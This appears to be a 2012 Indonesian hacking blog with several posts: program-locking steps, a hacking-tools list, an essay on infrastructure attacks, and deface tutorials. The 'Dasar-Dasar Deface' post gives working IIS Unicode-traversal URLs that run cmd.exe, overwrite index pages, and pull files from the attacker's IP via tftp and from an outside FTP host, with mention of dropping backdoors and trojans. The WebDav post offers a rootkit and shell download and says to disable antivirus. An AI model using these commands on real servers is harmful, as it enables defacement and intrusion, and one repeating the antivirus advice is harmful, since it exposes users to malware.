Rabu, 29 Agustus 2012

0 Cara Mengunci Program Dengan Password


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Kadang kita kesal bila anggota keluarga kita seperti anak, adik yang masih sekolah menghabiskan waktunya untuk bermain game atau ber internet sehingga lupa makan, belajar dan lain-lain. Tidak mungkin kita harus menjagai komputer terus menerus, pasti ada suatu saat kita memiliki kesibukan sendiri di luar, nah pada kesempatan tersebut anggota keluarga akan merasa senang bila kita berpergian sehingga mereka bisa bermain sepuasnya tanpa ada yang melarang atau mengawasinya.
Cara yang terbaik adalah mendisiplinkan mereka, dengan cara mengunci program tertentu, seperti game, mozilla firfox, mp3 playar, DVD Playaer dll sehingga kita tidak perlu mengawasi komputer terus. Bila sebuah program telah di protek, siapa saja yang ingin membukanya harus memasukkan pasword. Bila mereka tidak tau paswordnya maka program tersebut tidak dapat digunakan.
Dengan demikian bila mereka ingin bermain, maka mereka akan meminta izin agar kita membuka program yang ingin mereka mainkan. Sehingga kita dapat mengatur skedul mereka, karena yang mengetahui pasword yang berhak untuk membuka program tersebut, sehingga mereka yang memiliki pasword dapat mengatur kapan seseorang boleh menggunakan aplikasi tersebut, dengan demikian kita dapat mendisiplinkan anggota keluarga.
Bagaimana cara melakukannya
Sebagai contoh disini saya akan memproteksi browser Internet Firefox, untuk mendisiplinkan seseorang atau anggota keluarga bermain internet. Untuk memprotek program aplikasi anda harus mengikuti langkah-langkah berikut :
  1. Anda harus memiliki sebuah program untuk memproteksi aplikasi. Download WinUtilities 9.75 Prof
  2. Install aplikasi tersebut dan jalankan programnya.
  3. Klik Menu Privacy & Security, kemudian klik menu EXE Protector di sebelah kanan (Lihat gambar dibawah)
  4.  
  5. Klik Next untuk melanjutkan dari jendela Welcome to WinUtilities Exe Protector
  6. Bila muncul jendela dialog baru, pilih dan centrang menu Protect My Executable file With a password, lalu klik Next
  7. Proses selanjutnya, masukkan nama file dan lokasinya, atau bila anda tidak mengetahui, klik Brows pada bagian Select a file.
  8. Pilih file eksekusi dari program yang hendak kita proteksi, disini sebagai contoh kita ingin memproteksi Mizilla Firefox (lihat gambar dibawah)
  9. Setelah anda memilih file yang ingin diprotek, klik Next untuk melanjutkan ke langkah berikutnya.
  10. Masukkan pasword yang ingin anda buat, kemudian masukkan sekalilagi pasword yang sama untuk konfirmasi, lalu klik Next
  11. Klik tombol Next bila muncul jendela Windows Task Report
  12. Kemudian WinUtilities akan memproses, dan klik close bila registrasi succsess 100%
Setelah anda melakukan langkah tersebut diatas, coba buka program yang telah anda kunci tersebut (contoh di sini memproteksi Mozilla Firefox), maka ketika anda mengklik program yang ingin anda jalankan, maka akan diminta untuk memasukkan pasword.
Selamat mencoba semoga bermanfaat

0 Best 15 Security Hacking Tools & Utilities


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
 Assalamualaikum Wr. Wb.
bertemu lagi dengan saya rizky ... gimana kabar kalian ??
semoga dalam keada'an sehat wal afiat amin . ok langsung saja kali ini saya akan membahas tentang beberapa program yang di bilang cukup bagus dalam dunia hacking ... mari kita simak sama-sama.

1. NmapSaya pikir semua orang telah mendengar tentang yang satu ini, baru-baru ini berkembang menjadi seri 4.x.Nmap (Network Mapper) adalah utilitas open source gratis untuk eksplorasi jaringanatau keamanan audit. Ini dirancang untuk cepat memindai jaringan yang besar, meskipunbekerja dengan baik terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang baru untukmenentukan apa host yang tersedia pada jaringan, layanan apa (aplikasinama dan versi) host-host yang menawarkan, apa sistem operasi (dan OSversi) mereka berjalan, apa jenis packet filter / firewall sedang digunakan,dan puluhan karakteristik lain. Nmap berjalan pada sebagian besar jenis komputer danbaik versi konsol dan grafis yang tersedia. Nmap bebas dan open source.Dapat digunakan oleh pemula (-sT) atau oleh pro sama (packet_trace). Yang sangatalat serbaguna, setelah Anda memahami hasil.Get Nmap Here

2. Nessus Keamanan jauh ScannerBaru-baru ini pergi sumber tertutup, tapi masih dasarnya bebas. Bekerja dengan klien-Server kerangka.Nessus adalah dunia yang paling populer kerentanan pemindai yang digunakan di lebih dari 75.000organisasi di seluruh dunia. Banyak organisasi terbesar duniamerealisasikan penghematan biaya yang signifikan dengan menggunakan Nessus untuk mengaudit bisnis pentingperusahaan perangkat dan aplikasi.
Get Nessus Here

3. John the RipperYa, JTR 1,7 baru-baru ini dirilis!John the Ripper adalah password cracker yang cepat, saat ini tersedia untuk banyakrasa Unix (11 secara resmi didukung, tidak menghitung yang berbedaarsitektur), DOS, Win32, BeOS, dan OpenVMS. Tujuan utamanya adalah untuk mendeteksipassword Unix yang lemah. Selain beberapa crypt (3) sandi jenis hash yang paling umumditemukan di berbagai rasa Unix, didukung di luar kotak adalah Kerberos AFS danWindows NT/2000/XP/2003 LM hash, ditambah lagi dengan beberapa patch berkontribusi.
You can get JTR Here

4. NiktoNikto adalah Source (GPL) web scanner server yang Terbuka yang melakukan yang komprehensiftes terhadap server web untuk beberapa item, termasuk lebih dari 3200 berpotensiberbahaya file / CGIS, versi di lebih dari 625 server, dan versi yang spesifikmasalah pada lebih dari 230 server. Item Scan dan plugins sering diperbarui dandapat secara otomatis diperbarui (jika diinginkan).Nikto adalah scanner CGI yang baik, ada beberapa alat lain yang cocok dengan Nikto(Fokus pada sidik jari http atau Google hacking / info dll pengumpulan, lainartikel untuk hanya mereka).
Get Nikto Here

5. SuperScanPowerfull TCP port scanner, pinger, penyelesai. SuperScan 4 adalah update dariWindows yang sangat populer port scanning alat, SuperScan.Jika Anda perlu alternatif untuk nmap pada Windows dengan antarmuka yang layak, sayasarankan Anda memeriksa ini keluar, itu cukup bagus.
Get SuperScan Here

6. p0fP0f v2 pasif alat serbaguna OS fingerprinting. P0f dapat mengidentifikasisistem operasi pada:- Mesin yang terhubung ke komputer anda (SYN modus),- Mesin Anda terhubung ke (mode + SYN ACK),- Mesin Anda tidak dapat terhubung ke (RST + modus),- Mesin yang dapat mengamati komunikasi Anda.Pada dasarnya sidik jari dapat apa-apa, hanya dengan mendengarkan, itu tidak membuat APAPUNaktif koneksi ke mesin target.Dapatkan p0f Sini - http://lcamtuf.coredump.cx/p0f/p0f.shtml
7. Wireshark (Formely Ethereal)Wireshark adalah +-jaringan berbasis protokol analyzer GTK, atau sniffer, yang memungkinkan Andamenangkap dan interaktif menelusuri isi dari frame jaringan. Tujuan dariproyek ini adalah untuk membuat analisa komersial berkualitas untuk Unix dan untuk memberikanWireshark fitur yang hilang dari sumber tertutup sniffers.Karya besar pada kedua Linux dan Windows (dengan GUI), mudah digunakan dan dapatmerekonstruksi TCP / IP Streaming! Akan melakukan tutorial tentang Wireshark nanti.
Get Wireshark Here

8. YersiniaYersinia adalah alat jaringan yang dirancang untuk mengambil keuntungan dari weakeness beberapa diLayer 2 protokol yang berbeda. Ini berpura-pura menjadi kerangka kerja yang solid untuk menganalisisdan pengujian jaringan dan sistem dikerahkan. Saat ini, jaringan berikutprotokol yang diimplementasikan: Spanning Tree Protocol (STP), Cisco DiscoveryProtokol (CDP), Dinamis Trunking Protocol (DTP), Dynamic Host ConfigurationProtocol (DHCP), Hot siaga Router Protocol (HSRP), IEEE 802.1q, Inter-SwitchProtokol link (ISL), VLAN Trunking Protocol (VTP).Layer terbaik 2 kit ada.
Get Yersinia Here

9. PenghapusEraser merupakan alat keamanan yang canggih (untuk Windows), yang memungkinkan Anda untuksepenuhnya menghapus data sensitif dari hard drive Anda dengan Timpa beberapakali dengan pola yang dipilih dengan cermat. Bekerja dengan Windows 95, 98, ME, NT,2000, XP dan DOS. Eraser adalah perangkat lunak gratis dan kode sumbernya dirilis di bawahGNU General Public License.Sebuah alat yang sangat baik untuk menjaga data Anda benar-benar aman, jika Anda telah dihapus .. membuatyakin itu benar-benar pergi, Anda tidak ingin menggantung sekitar untuk menggigit Anda di pantat.
Get Eraser Here

10. PuttyPutty adalah implementasi bebas dari Telnet dan SSH untuk Win32 dan platform Unix,bersama dengan xterm terminal emulator. Harus memiliki untuk setiap h4. 0r ingintelnet atau SSH dari Windows tanpa harus menggunakan default jelek MS perintahgaris klien.
Get PuTTY Here

11. LCPTujuan utama dari program LCP adalah password account pengguna audit dan pemulihan diWindows NT/2000/XP/2003. Akun mengimpor informasi, pemulihan Sandi, Brutesesi kekuatan distribusi, kilatan komputasi.Sebuah alternatif gratis baik untuk L0phtCrack.LCP secara singkat disebutkan dalam Tabel banyak membaca kita Rainbow dan RainbowCrackartikel.
Get LCP Her

12. Kain dan HabelSaya pribadi favorit untuk cracking password apapun.Cain & Abel adalah pemulihan password alat untuk Sistem Operasi Microsoft. Inimemungkinkan pemulihan mudah berbagai jenis password oleh mengendus jaringan,retak dienkripsi password menggunakan Dictionary, Brute-Force dan Kriptanalisisserangan, rekaman percakapan VoIP, decoding orak-arik password, mengungkapkansandi kotak, mengungkap password cache dan menganalisis protokol routing.Program ini tidak mengeksploitasi kelemahan software apapun atau bug yang dapattidak diperbaiki dengan sedikit usaha.
Get Cain and Abel Here

13. NasibKismet adalah detektor jaringan layer2 802,11 nirkabel, sniffer, dan intrusisistem deteksi. Kismet akan bekerja dengan kartu nirkabel yang mendukung bakupemantauan (rfmon) modus, dan dapat mengendus lalu lintas 802.11b, 802.11a, dan 802.11g.Sebuah alat nirkabel yang baik asalkan kartu Anda mendukung rfmon (mencari orinoccoemas).
Get Kismet Here

14. NetstumblerYa sebuah alat nirkabel yang layak untuk Windows! Sayangnya tidak sekuat itu Linuxrekan-rekan, tapi mudah digunakan dan memiliki antarmuka yang bagus, baik untukdasar-dasar perang mengemudi.Netstumbler adalah alat untuk Windows yang memungkinkan Anda untuk mendeteksi Wireless Local AreaJaringan (WLAN) dengan menggunakan 802.11b, 802.11a dan 802.11g. Ia memiliki banyak kegunaan:Pastikan bahwa jaringan anda sudah diatur dengan cara yang Anda inginkan.Cari lokasi dengan cakupan miskin di WLAN Anda.Mendeteksi jaringan lain yang mungkin menyebabkan gangguan pada jaringan Anda.Mendeteksi titik akses yang tidak sah nakal di tempat kerja Anda.Bantuan bertujuan antena directional untuk jarak jauh link WLAN.Gunakan bersenang-senang untuk WarDriving.
Get NetStumbler Here


15. hpingUntuk menyelesaikan, sesuatu yang sedikit lebih maju jika Anda ingin menguji TCP / IPpaket monyet keterampilan.hping adalah baris perintah berorientasi paket TCP / IP assembler / analyzer. Paraantarmuka terinspirasi untuk perintah unix ping, tetapi hping tidak hanya mampumengirimkan permintaan ICMP echo. Ini mendukung TCP, UDP, protokol ICMP dan RAW-IP, memilikimodus traceroute, kemampuan untuk mengirim file antara saluran tertutup, dan banyakfitur lainnya.
Get hping Here

Selasa, 28 Agustus 2012

0 {Fire Sale-


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!


       Fire sale hanya membutuhkan 3 titik inti untuk dilumpuhkan pada suatu Negara sehingga Negara tersebut mengalami bencana kekacauan sistematis (systematic chaos). Kita pernah mengalami systematic chaos pada awal millennium tahun 2000 lalu, yang kita kenal dengan istilah Y2K. Fire sale sangat berbeda dengan Y2K, karena peristiwa Y2K adalah murni alami, bukan sebuah perencanaan. Sedangkan fire sale jelas sebuah rencana besar untuk membagun ulang sebuah system yang akan dikuasai sepenuhnya oleh pelakunya. Kembali ke 3 titik inti yang akan diserang oleh peretas fire sale, ketiga titik tersebut yaitu: (1) Sektor transportasi yang mencakup system lampu merah lalu lintas, penunjuk jalan digital, dll, (2) sector pelayanan public dan keamanan, yang mencakup telekomunikasi, data sensus, data kemanan, bahkan pengendalian langsung persenjataan negara, dan (3) Sektor financial Negara, jelas mencakup keuangan Negara serta inventory financial lain milik Negara. 


       Dibutuhkan peretas yang sangat ahli dan berpengalaman dalam melakukan Fire Sale, karena peretasan system nasional bukan lah hal yang mudah. Akan ada banyak algoritma yang beraneka ragam dan untuk meng-enkripsi data-data rahasia Negara. Tentu saja pakar IT pemerintah bukan orang sembarangan yang hanya bisa mengoperasikan dan menguasai beberapa algoritma “saja”. Akan tetapi pemerintah juga harus memperhatikan kualitas pekerja departemen IT Negara-nya, karena faktor perkembangan teknologi yang terus berkembang pesat maka secara otomatis akan banyak juga celah bagi peretas-peratas yang sudah mengetahui perkembangan teknologi yang akan dipakai atau yang akan menjadi “trend”.


     Kembali pada ketiga titik inti yang menjadi sasaran fire sale, yaitu:
   (1) Sector Transportasi; jika terserang oleh peretas maka akan ada banyak kekacauan lalu lintas dimana-mana. Bayangkan saja jika lampu merah Ibu kota Jakarta kita diretas oleh pihak tidak bertanggung jawab, bayangkan saja Deadlock pada operasi computer kita tetapi terjadi di tengah persimpangan jalan raya besar dimana mobil-mobil mati langkah. Mungkin sebelum terjadi deadlock jalan raya ini, sudah terjadi kecelakaan sebelumnya? Apapun bisa terjadi.

  (2) Sector Pelayanan dan Keamanan Publik; yang terserang peretas akan menjadi bencana yang sangat ampuh untuk melumpuhkan sebagian Negara. Seandainya system telekomunikasi diretas, maka bagian yang paling mudah ditebak adalah putusnya jaringan telfon, atau mungkin jaringan internet, bisa saja peretas mematikan kedua jaringan. Bukan hanya telekomunikasi, pelayanan public juga mencakup pelayanan energy listrik, air, dsb. Bisakah kita hidup tanpa adanya listrik? Atau kacaunya pemanfaatan tenaga air (PLTA)? Sama saja kembali ke zaman prasejarah. Kemudian peretas akan menyerang keamanan public  sekaligus nasional. Keamanan akan sangat berbahaya, bisa dikatakan senjata yang kita beli akan menyerang kita sendiri dikarenakan system yang telah diretas dan dikuasai oleh peratas, atau kemungkinan terburuk adalah peretas meluncurkan serangan kepada Negara lain melalui system keamanan nasional kita, dan sudah pasti akan memancing perang antar Negara, bahkan perang dunia.

   (3) Sector financial Negara; menjadi target terakhir Fire Sale. Alasan yang cukup logis, karena jika kedua langkah di atas berjalan sesuai dengan yang diharapkan, maka secara otomatis pemerintah akan mengesampingkan prioritas keamanan financial Negara. Pada saat itulah si peretas ini meluncurkan aksinya untuk membobol uang Negara dengan mudah, bahkan mungkin tanpa di sadari oleh pemerintah atau pihak berwenang di bidang financial tersebut. Apa yang bisa diharapkan dari Negara yang sudah porak-poranda dan bangkrut pula?

Akan tetapi banyak pakar yang menentang teori Fire Sale ini, teori cyber crime yang penuh kontroversi di kalangan peretas. Banyak yang berpendapat bahwa kejahatan cyber macam ini tidak mungkin terjadi karena dibutuhkan computer yang super canggih dan satu “pasukan peretas” yang ahli dalam bidang pembobolan dan algoritma yang unik dan beragam. Banyak pula peretas yang mengatakan Fire Sale hanya mitos dan tidak akan pernah terjadi. Semoga saja pendapat itu benar.


Namun saya berpendapat bahwa kejahatan cyber Fire Sale mungkin saja terjadi, kembali lagi ke faktor perkembangan teknologi yang pesat, dan kembali lagi kepada peretas-peratas yang sangat update dengan teknologi baru. Alasan-alasan itu yang mendasari pendapat saya pribadi, di tambah 2 sisi manusia, baik dan jahat. Pada saat ini saja hampir setiap hari kita mendengar tentang aneka ragam cyber crime yang terjadi, bahkan kita dapat melihat aksi para peretas yang meretas system keamanan sebuah apartement, gedung perusahaan, camera CCTV, dll di situs video terbesar. Bagaimanapun antisipasi dan pencegahan sangat diperlukan  untuk keamanan individu, kelompok, dan nasional, sebelum semuanya terlanjur terjadi.

Rabu, 08 Agustus 2012

0 Dasar-Dasar Deface


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Assalamu'alikum sop.. ktemu lagi nea sama saya sang calon bintang ip wkwkw
hmm gimana puasanya pada full kan he'... ok kita langsung saja mulai
Tollong di perhatikan ea .. asyikk heh just kidding.!!!
1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh-->> www.target.com

2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :

a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc

3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..

4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1

5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo

a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c:

Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+set /c+dir+c: di ubah menjadi /c+set

maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot

c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti

/c+dir+c: menjadi /c+copy+c:

lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe

sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+copy+c%3Awinntsystem32cmd.exe+c%3Ajangkrik.exe

sekarang kamu bisa liat file cmd1.exe udah ada di direktori :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita

d.) Cari halaman index ke www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwrootindex.htm

sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya

e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+copy+c%3Ainetpubwwwrootindex.htm+c%3Ainetpubwwwrooti ndex.htm.bak

f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootjangkrik.htm

/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada

c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis

Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga

g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau www.target.com/jangkrik.htm

Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:

B.) Deface WebSite Dengan Cara tftp

Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com/ ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :

a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html

b.)Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi

Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.

C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita

Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya

selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:

a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya

c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set

Kira Nya path nya di c:inetpubwwwroot

d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp

Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp

Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp

buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah


Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp

hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........

untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
seng duwur aku copas neng forum sebelah soalnya aku orak pinter nulis dowo karo kie tak kei seko gaweaan ku dewe dudu2 copas
sekedar share tool buat pemalas nie.. yg malas pake cara manual silahkan cobain yg ini,
tool ini sama kegunaanya kek punyanya om riluke (wekkzzz sok kenal wkwkwk)
cmn kalo buatannya om riluke kedetect sebagai trojan di kaspersky kalo ini ga ada sama skali n udah gwa buktiin ndiri
masalah kinerja ga jauh bedah lah.. sama buatannya riluke (itu sih pendapat gwa.. heheh)

0 Tutorial & Download Resource Hacker


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Assalamu'alaikum sobat.. apa kabarnya?
semoga Kita Dalam lindungan Tuhan.. Amin
Kesempatan kali ini, saya mau membahas seputar cracking source nih.. Okay dah tanpa panjang lebar lagi, mari kita bahas.

Apa itu Resource Hacker ??? dari judul nya saja mungkin anda sudah bisa menebak, bahwa ini merupakan Software FreeWare :D yang tugas nya.
1. Membuka source kode dari (*.exe, *.dll, *.cpl, *.ocx)
2. Merubah dan mengedit source secara langsung.
3. Memodifikasi secara langsung.

Nah 3 itu merupakan pokok penting dari Resource Hacker.
Kita ketahui dan kita pikir ? jika kita bisa membuka source dari software, berarti kita bisa membuat software itu juga :D hehehe.
Berbanggala anda pada diri anda sendiri.
Ini saya kasih SnapShot nya

Gambar di atas, saya lagi mau membuka source dari PhotoScape.
Setelah saya buka, dan saya buka table dialog, maka saya dapat kode sama tampilan nya seperti apa ? lihat gambar di bawah ini.

Okay mantap bukan ?? :-bd
Wuzup dah hehe, bagi kalian yang mau atau berminat ?
Silakan di download di sini

Download dan buka langsung aja.
Pelajari sendiri bagaimana cara pakai nya, biar anda bisa menjadi seorang master :D hehe.

0 Deface Dengan WebDav Shell Maker


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
hello sobat'...
Langsung aja yau…mungkin deface dengan Web Dav itu deface paling bawah alias gampang.
Saya akan memberikan tutor dan link download WebDav… Berhubung kebanyakan Hacker pemula menggunakan cara ini.. Jadi tidak usah khawatir akan kerusakan website.. Karena hanya halaman index saja yang di deface…
Download Files Berikut :
Download : Rootkit

Password  : cbf
Download : Shell

*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.
Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus… Saya sudah menyimpan aplikasi ini sekitar 2 minggu dan tidak terjadi apa-apa pada komputer saya sebaiknya matikan antivirus sebelum membuka aplikasi ini…
